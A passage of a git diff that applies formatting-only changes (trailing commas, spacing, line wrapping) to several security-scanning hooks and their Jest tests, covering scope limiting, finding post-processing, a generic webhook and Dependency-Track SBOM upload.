purgeCascadedRuleFromScan( scan.spec.env = scan.spec.env.filter( (scanEnv) => !cascadedRuleUsedForParentScan.spec.scanSpec.env.some((ruleEnv) => - isEqual(scanEnv, ruleEnv) - ) + isEqual(scanEnv, ruleEnv), + ), ); } @@ -257,8 +257,8 @@ export function purgeCascadedRuleFromScan( scan.spec.volumes = scan.spec.volumes.filter( (scanVolume) => !cascadedRuleUsedForParentScan.spec.scanSpec.volumes.some( - (ruleVolume) => isEqual(scanVolume, ruleVolume) - ) + (ruleVolume) => isEqual(scanVolume, ruleVolume), + ), ); } @@ -269,8 +269,8 @@ export function purgeCascadedRuleFromScan( scan.spec.volumeMounts = scan.spec.volumeMounts.filter( (scanVolumeMount) => !cascadedRuleUsedForParentScan.spec.scanSpec.volumeMounts.some( - (ruleVolumeMount) => isEqual(scanVolumeMount, ruleVolumeMount) - ) + (ruleVolumeMount) => isEqual(scanVolumeMount, ruleVolumeMount), + ), ); } @@ -287,8 +287,8 @@ export function purgeCascadedRuleFromScan( scan.spec.hookSelector.matchExpressions.filter( (scanHookSelector) => !cascadedRuleUsedForParentScan.spec.scanSpec.hookSelector.matchExpressions.some( - (ruleHookSelector) => isEqual(scanHookSelector, ruleHookSelector) - ) + (ruleHookSelector) => isEqual(scanHookSelector, ruleHookSelector), + ), ); } if ( @@ -321,16 +321,16 @@ async function getCascadingRule(ruleName) { "v1", namespace, "cascadingrules", - ruleName + ruleName, ); console.log( - `Fetched CascadingRule "${ruleName}" that triggered parent scan` + `Fetched CascadingRule "${ruleName}" that triggered parent scan`, ); return response.body; } catch (err) { console.error( - `Failed to get CascadingRule "${ruleName}" from the kubernetes api` + `Failed to get CascadingRule "${ruleName}" from the kubernetes api`, ); console.error(err); process.exit(1); diff --git a/hooks/cascading-scans/hook/scope-limiter.test.js b/hooks/cascading-scans/hook/scope-limiter.test.js index 99bc175f5a..1361ba1b69 100644 --- a/hooks/cascading-scans/hook/scope-limiter.test.js +++ b/hooks/cascading-scans/hook/scope-limiter.test.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const {isInScope: isInScopeInternal} = require("./scope-limiter"); +const { isInScope: isInScopeInternal } = require("./scope-limiter"); let scopeLimiter = undefined; let annotations = undefined; @@ -40,7 +40,7 @@ it("Requirement key must start with 'scope.cascading.securecodebox.io/'", () => }, ]; expect(isInScope).toThrowError( - "key 'engagement.scope/domains' is invalid: key does not start with 'scope.cascading.securecodebox.io/'" + "key 'engagement.scope/domains' is invalid: key does not start with 'scope.cascading.securecodebox.io/'", ); }); @@ -60,7 +60,7 @@ it("Requirement key must map to an annotation", () => { }; expect(isInScope).toThrowError( - "using operator 'In': the referenced annotation may not be undefined" + "using operator 'In': the referenced annotation may not be undefined", ); }); @@ -90,7 +90,7 @@ describe("Templating", function () { }, ]; expect(isInScope).toThrowError( - "using operator 'Contains': the referenced annotation may not be undefined" + "using operator 'Contains': the referenced annotation may not be undefined", ); }); @@ -229,7 +229,7 @@ describe("Templating", function () { finding = {}; expect(isInScope).toThrowError( - "Invalid list key 'attributes'. List key must be at least 2 levels deep. E.g. 'attributes.addresses'" + "Invalid list key 'attributes'. List key must be at least 2 levels deep. E.g. 'attributes.addresses'", ); }); }); @@ -540,7 +540,7 @@ describe("Templating", function () { }; expect(isInScope).toThrowError( - "Invalid list key 'attributes.addresses'. List key must be at least 3 levels deep. E.g. 'attributes.addresses.ip'" + "Invalid list key 'attributes.addresses'. List key must be at least 3 levels deep. E.g. 'attributes.addresses.ip'", ); }); @@ -827,7 +827,7 @@ describe("Operator", function () { }, ]; expect(isInScope).toThrowError( - "I am not a domain is an invalid domain name" + "I am not a domain is an invalid domain name", ); }); @@ -843,7 +843,7 @@ describe("Operator", function () { }, ]; expect(isInScope).toThrowError( - "I am not a domain is an invalid domain name" + "I am not a domain is an invalid domain name", ); }); diff --git a/hooks/cascading-scans/hook/scope-limiter.ts b/hooks/cascading-scans/hook/scope-limiter.ts index 7ca5a91c8b..ac45b3932c 100644 --- a/hooks/cascading-scans/hook/scope-limiter.ts +++ b/hooks/cascading-scans/hook/scope-limiter.ts @@ -2,12 +2,12 @@ // // SPDX-License-Identifier: Apache-2.0 -import {Finding, ScopeLimiter, ScopeLimiterAliases} from "./scan-helpers"; -import {V1ObjectMeta} from "@kubernetes/client-node/dist/gen/model/v1ObjectMeta"; +import { Finding, ScopeLimiter, ScopeLimiterAliases } from "./scan-helpers"; +import { V1ObjectMeta } from "@kubernetes/client-node/dist/gen/model/v1ObjectMeta"; import Mustache from "mustache"; -import {Address4, Address6} from "ip-address"; -import {fromUrl, parseDomain, ParseResultType} from "parse-domain"; -import {flatten, isEqual, takeRight} from "lodash"; +import { Address4, Address6 } from "ip-address"; +import { fromUrl, parseDomain, ParseResultType } from "parse-domain"; +import { flatten, isEqual, takeRight } from "lodash"; export enum ScopeLimiterRequirementOperator { In = "In", @@ -32,7 +32,7 @@ export function isInScope( scopeLimiter: ScopeLimiter, scanAnnotations: V1ObjectMeta["annotations"], finding: Finding, - scopeLimiterAliases: ScopeLimiterAliases + scopeLimiterAliases: ScopeLimiterAliases, ) { if (scopeLimiter === undefined) return true; @@ -44,12 +44,12 @@ export function isInScope( }: ScopeLimiterRequirement): boolean { if (!key.startsWith(`${scopeDomain}`)) { throw new Error( - `key '${key}' is invalid: key does not start with '${scopeDomain}'` + `key '${key}' is invalid: key does not start with '${scopeDomain}'`, ); } // Retrieve operator and validator functions from user operator input - const {operator: operatorFunction, validator: validatorFunction} = + const { operator: operatorFunction, validator: validatorFunction } = operatorFunctions[operator]; if (operatorFunction === undefined) { throw new Error(`Unknown operator '${operator}'`); @@ -83,7 +83,10 @@ export function isInScope( return operatorFunction(props); } - function templateValue(value: string): {values: string[]; rendered: boolean} { + function templateValue(value: string): { + values: string[]; + rendered: boolean; + } { if (value === undefined) return { values: [], @@ -110,13 +113,13 @@ export function isInScope( const path = text.split("."); if (path.length < 3) { throw new Error( - `Invalid list key '${text}'. List key must be at least 3 levels deep. E.g. 'attributes.addresses.ip'` + `Invalid list key '${text}'. List key must be at least 3 levels deep. E.g. 'attributes.addresses.ip'`, ); } const listKey = path.slice(0, path.length - 1).join("."); const objectKey = path.pop(); return render( - `{{#${listKey}}}{{${objectKey}}}${delimiter}{{/${listKey}}}` + `{{#${listKey}}}{{${objectKey}}}${delimiter}{{/${listKey}}}`, ); }; }, @@ -127,7 +130,7 @@ export function isInScope( const path = text.split("."); if (path.length < 2) { throw new Error( - `Invalid list key '${text}'. List key must be at least 2 levels deep. E.g. 'attributes.addresses'` + `Invalid list key '${text}'. List key must be at least 2 levels deep. E.g. 'attributes.addresses'`, ); } return render(`{{#${text}}}{{.}}${delimiter}{{/${text}}}`); @@ -237,8 +240,8 @@ const operatorFunctions: { }; function validate( - {scopeAnnotationValue, findingValues}: Operands, - scopeAnnotationValueUndefinedAllowed + { scopeAnnotationValue, findingValues }: Operands, + scopeAnnotationValueUndefinedAllowed, ) { if ( !scopeAnnotationValueUndefinedAllowed && @@ -254,7 +257,10 @@ function validate( * scopeAnnotationValue: "example.com" * findingValues: ["example.com", "subdomain.example.com"] */ -function operatorIn({scopeAnnotationValue, findingValues}: Operands): boolean { +function operatorIn({ + scopeAnnotationValue, + findingValues, +}: Operands): boolean { return findingValues.includes(scopeAnnotationValue); } @@ -270,7 +276,7 @@ function operatorContains({ }: Operands): boolean { const scopeAnnotationValues = scopeAnnotationValue.split(","); return findingValues.every((findingValue) => - scopeAnnotationValues.includes(findingValue) + scopeAnnotationValues.includes(findingValue), ); } @@ -341,7 +347,7 @@ function operatorSubdomainOf({ // Check if last part of domain is equal return isEqual( scopeAnnotationDomain.labels, - takeRight(findingDomain.labels, scopeAnnotationDomain.labels.length) + takeRight(findingDomain.labels, scopeAnnotationDomain.labels.length), ); } throw new Error(`${findingValue} is an invalid domain name`); diff --git a/hooks/finding-post-processing/hook/hook.js b/hooks/finding-post-processing/hook/hook.js index 6522916854..ca6a9ba4a0 100644 --- a/hooks/finding-post-processing/hook/hook.js +++ b/hooks/finding-post-processing/hook/hook.js @@ -25,7 +25,7 @@ function applyRules(rules, findings) { let newFinding = finding; for (const rule of rules) { const isRuleMatching = rule.matches.anyOf.some((condition) => - isMatch(finding, condition) + isMatch(finding, condition), ); if (isRuleMatching) { hasChanged = true; diff --git a/hooks/finding-post-processing/hook/hook.test.js b/hooks/finding-post-processing/hook/hook.test.js index 951287fae1..8ef9265669 100644 --- a/hooks/finding-post-processing/hook/hook.test.js +++ b/hooks/finding-post-processing/hook/hook.test.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { handle } = require("./hook") +const { handle } = require("./hook"); test("Should Add High Severity and Description", async () => { const findings = [ @@ -11,28 +11,30 @@ test("Should Add High Severity and Description", async () => { attributes: { hostname: "foobar.com", port: 23, - state: "open" + state: "open", }, }, ]; - const rules = [{ - matches: { - anyOf: [ - { - category: "Open Port", - attributes: { - port: 23, - state: "open" - } - }, - ] + const rules = [ + { + matches: { + anyOf: [ + { + category: "Open Port", + attributes: { + port: 23, + state: "open", + }, + }, + ], + }, + override: { + severity: "high", + description: "Telnet is bad", + }, }, - override: { - severity: "high", - description: "Telnet is bad" - } - }] + ]; const getFindings = async () => findings; @@ -50,11 +52,11 @@ test("Should Add High Severity and Description", async () => { attributes: { hostname: "foobar.com", port: 23, - state: "open" + state: "open", }, severity: "high", - description: "Telnet is bad" - } + description: "Telnet is bad", + }, ]); }); @@ -65,35 +67,37 @@ test("Should Check Multiple 'anyOf'", async () => { attributes: { hostname: "foobar.com", port: 23, - state: "open" + state: "open", }, }, ]; - const rules = [{ - matches: { - anyOf: [ - { - category: "Open Port", - attributes: { - port: 22, - state: "open" - } - }, - { - category: "Open Port", - attributes: { - port: 23, - state: "open" - } - }, - ] + const rules = [ + { + matches: { + anyOf: [ + { + category: "Open Port", + attributes: { + port: 22, + state: "open", + }, + }, + { + category: "Open Port", + attributes: { + port: 23, + state: "open", + }, + }, + ], + }, + override: { + severity: "high", + description: "Telnet is bad", + }, }, - override: { - severity: "high", - description: "Telnet is bad" - } - }] + ]; const getFindings = async () => findings; @@ -111,11 +115,11 @@ test("Should Check Multiple 'anyOf'", async () => { attributes: { hostname: "foobar.com", port: 23, - state: "open" + state: "open", }, severity: "high", - description: "Telnet is bad" - } + description: "Telnet is bad", + }, ]); }); @@ -126,35 +130,37 @@ test("Should Ignore Rule Without Matching Conditions", async () => { attributes: { hostname: "foobar.com", port: 23, - state: "open" + state: "open", }, }, ]; - const rules = [{ - matches: { - anyOf: [ - { - category: "Open Port", - attributes: { - port: 22, - state: "open" - } - }, - { - category: "Open Port", - attributes: { - port: 24, - state: "open" - } - }, - ] + const rules = [ + { + matches: { + anyOf: [ + { + category: "Open Port", + attributes: { + port: 22, + state: "open", + }, + }, + { + category: "Open Port", + attributes: { + port: 24, + state: "open", + }, + }, + ], + }, + override: { + severity: "high", + description: "Telnet is bad", + }, }, - override: { - severity: "high", - description: "Telnet is bad" - } - }] + ]; const getFindings = async () => findings; @@ -176,7 +182,7 @@ test("Should Not Duplicate Findings For Multiple Matching Rules", async () => { attributes: { hostname: "foobar.com", port: 23, - state: "open" + state: "open", }, }, ]; @@ -189,15 +195,15 @@ test("Should Not Duplicate Findings For Multiple Matching Rules", async () => { category: "Open Port", attributes: { port: 23, - state: "open" - } + state: "open", + }, }, - ] + ], }, override: { severity: "high", - description: "Telnet is bad" - } + description: "Telnet is bad", + }, }, { matches: { @@ -205,18 +211,18 @@ test("Should Not Duplicate Findings For Multiple Matching Rules", async () => { { category: "Open Port", attributes: { - state: "open" - } + state: "open", + }, }, - ] + ], }, override: { severity: "high", description: "Telnet is bad", - ticket: "Issue #33" - } - } - ] + ticket: "Issue #33", + }, + }, + ]; const getFindings = async () => findings; @@ -228,20 +234,21 @@ test("Should Not Duplicate Findings For Multiple Matching Rules", async () => { rules: rules, }); - const expected = [{ - category: "Open Port", - attributes: { - port: 23, - hostname: "foobar.com", - state: "open" + const expected = [ + { + category: "Open Port", + attributes: { + port: 23, + hostname: "foobar.com", + state: "open", + }, + severity: "high", + description: "Telnet is bad", + ticket: "Issue #33", }, - severity: "high", - description: "Telnet is bad", - ticket: "Issue #33" - }] + ]; expect(updateFindings).toBeCalledWith(expected); - }); test("Should Update Nested Attributes", async () => { @@ -251,32 +258,34 @@ test("Should Update Nested Attributes", async () => { attributes: { hostname: "foobar.com", port: 23, - state: "open" + state: "open", }, }, ]; - const rules = [{ - matches: { - anyOf: [ - { - category: "Open Port", - attributes: { - port: 23, - state: "open" - } + const rules = [ + { + matches: { + anyOf: [ + { + category: "Open Port", + attributes: { + port: 23, + state: "open", + }, + }, + ], + }, + override: { + severity: "high", + attributes: { + hostname: "foo.bar", + port: 42, }, - ] - }, - override: { - severity: "high", - attributes: { - hostname: "foo.bar", - port: 42, + description: "Telnet is bad", }, - description: "Telnet is bad" - } - }] + }, + ]; const getFindings = async () => findings; @@ -294,13 +303,12 @@ test("Should Update Nested Attributes", async () => { attributes: { hostname: "foo.bar", port: 42, - state: "open" + state: "open", }, severity: "high", - description: "Telnet is bad" - } + description: "Telnet is bad", + }, ]); - }); test("Should Not Update Findings If No Rule Matches", async () => { @@ -310,32 +318,34 @@ test("Should Not Update Findings If No Rule Matches", async () => { attributes: { hostname: "foobar.com", port: 22, - state: "open" + state: "open", }, }, ]; - const rules = [{ - matches: { - anyOf: [ - { - category: "Open Port", - attributes: { - port: 23, - state: "open" - } + const rules = [ + { + matches: { + anyOf: [ + { + category: "Open Port", + attributes: { + port: 23, + state: "open", + }, + }, + ], + }, + override: { + severity: "high", + attributes: { + hostname: "foo.bar", + port: 42, }, - ] - }, - override: { - severity: "high", - attributes: { - hostname: "foo.bar", - port: 42, + description: "Telnet is bad", }, - description: "Telnet is bad" - } - }] + }, + ]; const getFindings = async () => findings; @@ -357,7 +367,7 @@ test("Should Ignore Findings That Don't Match The Rule", async () => { attributes: { hostname: "foo.com", port: 22, - state: "open" + state: "open", }, }, { @@ -365,7 +375,7 @@ test("Should Ignore Findings That Don't Match The Rule", async () => { attributes: { hostname: "bar.com", port: 22, - state: "open" + state: "open", }, }, { @@ -373,32 +383,34 @@ test("Should Ignore Findings That Don't Match The Rule", async () => { attributes: { hostname: "foobar.com", port: 22, - state: "open" + state: "open", }, }, ]; - const rules = [{ - matches: { - anyOf: [ - { - category: "Open Port", - attributes: { - hostname: "foobar.com", - port: 22, - state: "open" - } + const rules = [ + { + matches: { + anyOf: [ + { + category: "Open Port", + attributes: { + hostname: "foobar.com", + port: 22, + state: "open", + }, + }, + ], + }, + override: { + severity: "high", + attributes: { + port: 42, }, - ] - }, - override: { - severity: "high", - attributes: { - port: 42, + description: "Foobar", }, - description: "Foobar" - } - }] + }, + ]; const getFindings = async () => findings; @@ -416,7 +428,7 @@ test("Should Ignore Findings That Don't Match The Rule", async () => { attributes: { hostname: "foo.com", port: 22, - state: "open" + state: "open", }, }, { @@ -424,7 +436,7 @@ test("Should Ignore Findings That Don't Match The Rule", async () => { attributes: { hostname: "bar.com", port: 22, - state: "open" + state: "open", }, }, { @@ -432,11 +444,10 @@ test("Should Ignore Findings That Don't Match The Rule", async () => { attributes: { hostname: "foobar.com", port: 42, - state: "open" + state: "open", }, severity: "high", description: "Foobar", - } + }, ]); - -}) +}); diff --git a/hooks/generic-webhook/hook/hook.js b/hooks/generic-webhook/hook/hook.js index f441308de5..af12fb7290 100644 --- a/hooks/generic-webhook/hook/hook.js +++ b/hooks/generic-webhook/hook/hook.js @@ -10,18 +10,26 @@ async function handle({ webhookPassword = process.env["WEBHOOK_PASSWORD"], webhookApikeyHeaderName = process.env["WEBHOOK_APIKEY_HEADER_NAME"], webhookApikeyHeaderValue = process.env["WEBHOOK_APIKEY_HEADER_VALUE"], - axios = require('axios') + axios = require("axios"), }) { const findings = await getFindings(); console.log(`Sending ${findings.length} findings to ${webhookUrl}`); - if (webhookApikeyHeaderName && webhookApikeyHeaderValue){ - await axios.post(webhookUrl, {scan, findings }, {headers: { [webhookApikeyHeaderName]: webhookApikeyHeaderValue}}); - } else if (webhookUser && webhookPassword){ - await axios.post(webhookUrl, {scan, findings }, {auth: {username: webhookUser, password: webhookPassword}}); + if (webhookApikeyHeaderName && webhookApikeyHeaderValue) { + await axios.post( + webhookUrl, + { scan, findings }, + { headers: { [webhookApikeyHeaderName]: webhookApikeyHeaderValue } }, + ); + } else if (webhookUser && webhookPassword) { + await axios.post( + webhookUrl, + { scan, findings }, + { auth: { username: webhookUser, password: webhookPassword } }, + ); } else { - await axios.post(webhookUrl, {scan, findings }); + await axios.post(webhookUrl, { scan, findings }); } } module.exports.handle = handle; diff --git a/hooks/generic-webhook/hook/hook.test.js b/hooks/generic-webhook/hook/hook.test.js index 5f6f6f140e..2e4c397ef5 100644 --- a/hooks/generic-webhook/hook/hook.test.js +++ b/hooks/generic-webhook/hook/hook.test.js @@ -3,7 +3,7 @@ // SPDX-License-Identifier: Apache-2.0 const { handle } = require("./hook"); -const axios = jest.createMockFromModule('axios') +const axios = jest.createMockFromModule("axios"); beforeEach(() => { jest.clearAllMocks(); diff --git a/hooks/persistence-azure-monitor/hook/hook.js b/hooks/persistence-azure-monitor/hook/hook.js index 5ef8cbe9b7..486fcc3ef0 100644 --- a/hooks/persistence-azure-monitor/hook/hook.js +++ b/hooks/persistence-azure-monitor/hook/hook.js @@ -17,7 +17,7 @@ async function handle({ }) { if (!(workspaceId && sharedKey)) { console.error( - "Missing Workspace ID or shared key. Please provide them in the MONITOR_WORKSPACE_ID and MONITOR_SHARED_KEY environment variables" + "Missing Workspace ID or shared key. Please provide them in the MONITOR_WORKSPACE_ID and MONITOR_SHARED_KEY environment variables", ); process.exit(1); } @@ -39,7 +39,7 @@ async function handle({ scan_type: scan.spec.scanType, scan_parameters: scan.spec.parameters, scan_labels: scan.metadata.labels || {}, - })) + })), ); // Derive the LogType from the logTypePrefix and the scan type. @@ -101,9 +101,9 @@ async function handle({ } const { Error: errorCode, Message: errorMsg } = response.json(); console.error( - `An error occurred. Status Code: ${response.status}, status text: ${response.statusText}, Error: ${errorCode}, ErrorMsg: ${errorMsg}` + `An error occurred. Status Code: ${response.status}, status text: ${response.statusText}, Error: ${errorCode}, ErrorMsg: ${errorMsg}`, ); - } + }, ); } module.exports.handle = handle; diff --git a/hooks/persistence-azure-monitor/hook/hook.test.js b/hooks/persistence-azure-monitor/hook/hook.test.js index 04e500ea58..25d3b462b6 100644 --- a/hooks/persistence-azure-monitor/hook/hook.test.js +++ b/hooks/persistence-azure-monitor/hook/hook.test.js @@ -10,7 +10,7 @@ const { handle } = require("./hook"); // Mock the fetch function const fetch = jest.fn( - (x) => new Promise((resolve, reject) => resolve({ status: 200 })) + (x) => new Promise((resolve, reject) => resolve({ status: 200 })), ); beforeEach(() => { diff --git a/hooks/persistence-dependencytrack/hook/hook.js b/hooks/persistence-dependencytrack/hook/hook.js index 27902791e1..a826910763 100644 --- a/hooks/persistence-dependencytrack/hook/hook.js +++ b/hooks/persistence-dependencytrack/hook/hook.js @@ -7,7 +7,7 @@ async function handle({ scan, apiKey = process.env["DEPENDENCYTRACK_APIKEY"], baseUrl = process.env["DEPENDENCYTRACK_URL"], - fetch = global.fetch + fetch = global.fetch, }) { if (scan.status.rawResultType !== "sbom-cyclonedx") { // Not an SBOM scan, cannot be handled by Dependency-Track, ignore @@ -18,17 +18,27 @@ async function handle({ const result = await getRawResults(); if (result.bomFormat !== "CycloneDX") { // Not a CycloneDX SBOM, cannot be handled by Dependency-Track, ignore - console.log("Only CycloneDX SBOMs can be sent to DependencyTrack, ignoring."); + console.log( + "Only CycloneDX SBOMs can be sent to DependencyTrack, ignoring.", + ); return; } - console.log(`Persisting SBOM for ${result.metadata.component.name} to Dependency-Track`); + console.log( + `Persisting SBOM for ${result.metadata.component.name} to Dependency-Track`, + ); // Try to get the project name and version from annotations - let name, version + let name, version; if (scan?.metadata?.annotations) { - name = scan.metadata.annotations["dependencytrack.securecodebox.io/project-name"] - version = scan.metadata.annotations["dependencytrack.securecodebox.io/project-version"] + name = + scan.metadata.annotations[ + "dependencytrack.securecodebox.io/project-name" + ]; + version = + scan.metadata.annotations[ + "dependencytrack.securecodebox.io/project-version" + ]; } // Get the project name and version from the name attribute of the main component if the @@ -41,20 +51,22 @@ async function handle({ // but taken from pull request https://github.com/distribution/distribution/pull/3803 which // introduces the named groups and fixes the issue that in "bkimminich/juice-shop" the regex // detects "bkimminich" as part of the domain/host. - const imageRegex = new RegExp([ - '^(?(?:(?(?:localhost|(?:[a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9-]*[a-zA-Z0-9])', - '(?:\\.(?:[a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9-]*[a-zA-Z0-9]))+|', - '(?:[a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9-]*[a-zA-Z0-9])', - '(?:\\.(?:[a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9-]*[a-zA-Z0-9]))*', - '(?::[0-9]+)|\\[(?:[a-fA-F0-9:]+)\\](?::[0-9]+)?)(?::[0-9]+)?)\\/)?', - '(?[a-z0-9]+(?:(?:[._]|__|[-]+)[a-z0-9]+)*', - '(?:\\/[a-z0-9]+(?:(?:[._]|__|[-]+)[a-z0-9]+)*)*))', - '(?::(?[\\w][\\w.-]{0,127}))?', - '(?:@(?[A-Za-z][A-Za-z0-9]*(?:[-_+.][A-Za-z][A-Za-z0-9]*)*[:][0-9A-Fa-f]{32,}))?$', - ].join('')); - const groups = imageRegex.exec(result.metadata.component.name).groups - name = name || groups.name - version = version || groups.tag || groups.digest || "latest" + const imageRegex = new RegExp( + [ + "^(?(?:(?(?:localhost|(?:[a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9-]*[a-zA-Z0-9])", + "(?:\\.(?:[a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9-]*[a-zA-Z0-9]))+|", + "(?:[a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9-]*[a-zA-Z0-9])", + "(?:\\.(?:[a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9-]*[a-zA-Z0-9]))*", + "(?::[0-9]+)|\\[(?:[a-fA-F0-9:]+)\\](?::[0-9]+)?)(?::[0-9]+)?)\\/)?", + "(?[a-z0-9]+(?:(?:[._]|__|[-]+)[a-z0-9]+)*", + "(?:\\/[a-z0-9]+(?:(?:[._]|__|[-]+)[a-z0-9]+)*)*))", + "(?::(?[\\w][\\w.-]{0,127}))?", + "(?:@(?[A-Za-z][A-Za-z0-9]*(?:[-_+.][A-Za-z][A-Za-z0-9]*)*[:][0-9A-Fa-f]{32,}))?$", + ].join(""), + ); + const groups = imageRegex.exec(result.metadata.component.name).groups; + name = name || groups.name; + version = version || groups.tag || groups.digest || "latest"; // The POST endpoint expects multipart/form-data // Alternatively the PUT endpoint could be used, which requires base64-encoding the SBOM @@ -66,7 +78,7 @@ async function handle({ formData.append("projectVersion", version); formData.append("bom", JSON.stringify(result)); - const url = baseUrl.replace(/\/$/, "") + "/api/v1/bom" + const url = baseUrl.replace(/\/$/, "") + "/api/v1/bom"; console.log(`Uploading SBOM for name: ${name} version: ${version} to ${url}`); // Send request to API endpoint @@ -82,25 +94,33 @@ async function handle({ }); } catch (error) { console.error("Error sending request to Dependency-Track"); - throw error + throw error; } if (!response.ok) { switch (response.status) { case 401: - console.error(`Request failed with status ${response.status}, please check your API key`) + console.error( + `Request failed with status ${response.status}, please check your API key`, + ); break; case 403: - console.error(`Request failed with status ${response.status}, make sure you gave the team/API key either the PORTFOLIO_MANAGEMENT or PROJECT_CREATION_UPLOAD permission`) + console.error( + `Request failed with status ${response.status}, make sure you gave the team/API key either the PORTFOLIO_MANAGEMENT or PROJECT_CREATION_UPLOAD permission`, + ); break; } - throw new Error(`Request to Dependency-Track was unsuccessful, status ${response.status}`) + throw new Error( + `Request to Dependency-Track was unsuccessful, status ${response.status}`, + ); } // Response-token can be used to determine if any task is being performed on the BOM // Endpoint: /api/v1/bom/ const content = await response.json(); - console.log(`Successfully uploaded SBOM to Dependency-Track. Response-token to check the status: ${content.token}`); + console.log( + `Successfully uploaded SBOM to Dependency-Track. Response-token to check the status: ${content.token}`, + ); } module.exports.handle = handle; diff --git a/hooks/persistence-dependencytrack/hook/hook.test.js b/hooks/persistence-dependencytrack/hook/hook.test.js index 2d3f8a7ff3..7d8cafa197 100644 --- a/hooks/persistence-dependencytrack/hook/hook.test.js +++ b/hooks/persistence-dependencytrack/hook/hook.test.js @@ -3,10 +3,12 @@ // SPDX-License-Identifier: Apache-2.0 const { handle } = require("./hook"); -const fetch = jest.fn(() => Promise.resolve({ - ok: true, - json: () => Promise.resolve({ token: "statustoken" }) -})); +const fetch = jest.fn(() => + Promise.resolve({ + ok: true, + json: () => Promise.resolve({ token: "statustoken" }), + }), +); beforeEach(() => { jest.clearAllMocks(); @@ -23,11 +25,11 @@ test("should not send a post request if not an SBOM scan", async () => { name: "demo-trivy", }, status: { - rawResultType: "trivy-json" - } + rawResultType: "trivy-json", + }, }; - const apiKey = "verysecretgitleaksplsignore" + const apiKey = "verysecretgitleaksplsignore"; const baseUrl = "http://example.com/foo/bar"; await handle({ getRawResults, scan, apiKey, baseUrl, fetch }); @@ -41,15 +43,13 @@ test("should not send a post request if not a CycloneDX SBOM", async () => { dataLicense: "CC0-1.0", SPDXID: "SPDXRef-DOCUMENT", name: "bkimminich/juice-shop:v15.0.0", - documentNamespace: "https://anchore.com/syft/image/bkimminich/juice-shop-v15.0.0-f25938fd-9d66-4dc6-a4c6-b0390b4cf037", + documentNamespace: + "https://anchore.com/syft/image/bkimminich/juice-shop-v15.0.0-f25938fd-9d66-4dc6-a4c6-b0390b4cf037", creationInfo: { licenseListVersion: "3.21", - creators: [ - "Organization: Anchore, Inc", - "Tool: syft-0.85.0", - ], + creators: ["Organization: Anchore, Inc", "Tool: syft-0.85.0"], created: "2023-08-02T11:42:48Z", - } + }, }; const getRawResults = async () => result; @@ -61,11 +61,11 @@ test("should not send a post request if not a CycloneDX SBOM", async () => { name: "demo-sbom", }, status: { - rawResultType: "sbom-cyclonedx" - } + rawResultType: "sbom-cyclonedx", + }, }; - const apiKey = "verysecretgitleaksplsignore" + const apiKey = "verysecretgitleaksplsignore"; const baseUrl = "http://example.com/foo/bar"; await handle({ getRawResults, scan, apiKey, baseUrl, fetch }); @@ -78,9 +78,9 @@ test("should send a post request to the url when fired", async () => { bomFormat: "CycloneDX", metadata: { component: { - name: "hello-world:latest" - } - } + name: "hello-world:latest", + }, + }, }; const getRawResults = async () => result; @@ -90,32 +90,41 @@ test("should send a post request to the url when fired", async () => { uid: "69e71358-bb01-425b-9bde-e45653605490", name: "demo-sbom", annotations: { - "dependencytrack.securecodebox.io/project-name": "Hello World Container", - "dependencytrack.securecodebox.io/project-version": "latest and greatest" - } + "dependencytrack.securecodebox.io/project-name": + "Hello World Container", + "dependencytrack.securecodebox.io/project-version": + "latest and greatest", + }, }, status: { - rawResultType: "sbom-cyclonedx" - } + rawResultType: "sbom-cyclonedx", + }, }; - const apiKey = "verysecretgitleaksplsignore" + const apiKey = "verysecretgitleaksplsignore"; const baseUrl = "http://example.com/foo/bar"; - const url = baseUrl + "/api/v1/bom" + const url = baseUrl + "/api/v1/bom"; await handle({ getRawResults, scan, apiKey, baseUrl, fetch }); expect(fetch).toBeCalledTimes(1); - expect(fetch).toBeCalledWith(url, expect.objectContaining({ - method: "POST", - headers: { - "X-API-Key": apiKey, - }, - })); + expect(fetch).toBeCalledWith( + url, + expect.objectContaining({ + method: "POST", + headers: { + "X-API-Key": apiKey, + }, + }), + ); expect(fetch.mock.calls[0][1].body.get("bom")).toBe(JSON.stringify(result)); - expect(fetch.mock.calls[0][1].body.get("projectName")).toBe("Hello World Container"); - expect(fetch.mock.calls[0][1].body.get("projectVersion")).toBe("latest and greatest"); + expect(fetch.mock.calls[0][1].body.get("projectName")).toBe( + "Hello World Container", + ); + expect(fetch.mock.calls[0][1].body.get("projectVersion")).toBe( + "latest and greatest", + ); }); // Make sure that the crazy regex to parse the reference parts actually works @@ -123,64 +132,72 @@ test.each([ { reference: "bkimminich/juice-shop:v15.0.0", name: "bkimminich/juice-shop", - version: "v15.0.0" + version: "v15.0.0", }, { - reference: "ubuntu@sha256:b492494d8e0113c4ad3fe4528a4b5ff89faa5331f7d52c5c138196f69ce176a6", + reference: + "ubuntu@sha256:b492494d8e0113c4ad3fe4528a4b5ff89faa5331f7d52c5c138196f69ce176a6", name: "ubuntu", - version: "sha256:b492494d8e0113c4ad3fe4528a4b5ff89faa5331f7d52c5c138196f69ce176a6" + version: + "sha256:b492494d8e0113c4ad3fe4528a4b5ff89faa5331f7d52c5c138196f69ce176a6", }, { reference: "hello-world", name: "hello-world", - version: "latest" + version: "latest", }, { reference: "gcr.io/distroless/cc-debian12:debug-nonroot", name: "gcr.io/distroless/cc-debian12", - version: "debug-nonroot" + version: "debug-nonroot", }, { reference: "myawesomedockerhub.example.org:8080/notthetag", name: "myawesomedockerhub.example.org:8080/notthetag", - version: "latest" + version: "latest", }, -])("should detect image reference components accurately", async ({ reference, name, version }) => { - const result = { - bomFormat: "CycloneDX", - metadata: { - component: { - name: reference - } - } - }; - - const getRawResults = async () => result; - - const scan = { - metadata: { - uid: "a30122a6-7f1a-4e37-ae81-2c25ed7fb8f5", - name: "demo-sbom", - }, - status: { - rawResultType: "sbom-cyclonedx" - } - }; - - const apiKey = "verysecretgitleaksplsignore" - const baseUrl = "http://example.com/foo/bar"; - const url = baseUrl + "/api/v1/bom" - - await handle({ getRawResults, scan, apiKey, baseUrl, fetch }); - - 